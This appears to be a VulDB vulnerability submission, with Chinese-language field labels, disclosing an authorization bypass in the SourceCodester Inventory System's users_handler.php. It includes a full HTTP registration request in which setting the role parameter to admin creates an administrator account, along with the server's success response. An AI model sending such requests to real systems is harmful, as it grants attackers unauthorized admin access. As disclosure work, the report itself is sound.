| 标题 | SourceCodester Inventory System using PHP and MySQL Source Code 0 Authorization Bypass |
|---|
| 描述 | During the assessment of the application it was observed that the code developer has missed a very critical path during the account creation. As the application allows to create accounts for the staff, there is a ROLE parameter when set to admin bypasses the restrction and creates the staff account by migrating it to admin.
For example:
POST /Product_Inventory/api/users_handler.php HTTP/1.1
Host: localhost
Content-Length: 84
sec-ch-ua-platform: "macOS"
Accept-Language: en-US,en;q=0.9
sec-ch-ua: "Not-A.Brand";v="24", "Chromium";v="146"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/Product_Inventory/register.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=4k1d9iv3r8rfq72isu5j3utogq
Connection: keep-alive
full_name=fakeadmin&username=fakeadmin&password=fakeadmin&action=register&role=staff // VULNERABLE
Changing the above to the following creates an admin account.
full_name=fakeadmin&username=fakeadmin&password=fakeadmin&action=register&role=admin // VULNERABLE
While the response that is received is 200 and the account is created successfully.
{"success":true,"message":"User registered successfully!"} |
|---|
| 用户 | Kamran Saifullah (UID 4218) |
|---|
| 提交 | 2026-05-24 08時56分 (16 日前) |
|---|
| 管理 | 2026-06-07 18時01分 (14 days later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 369139 [SourceCodester Inventory System 1.0 Account Creation users_handler.php ROLE 权限提升] |
|---|
| 积分 | 17 |
|---|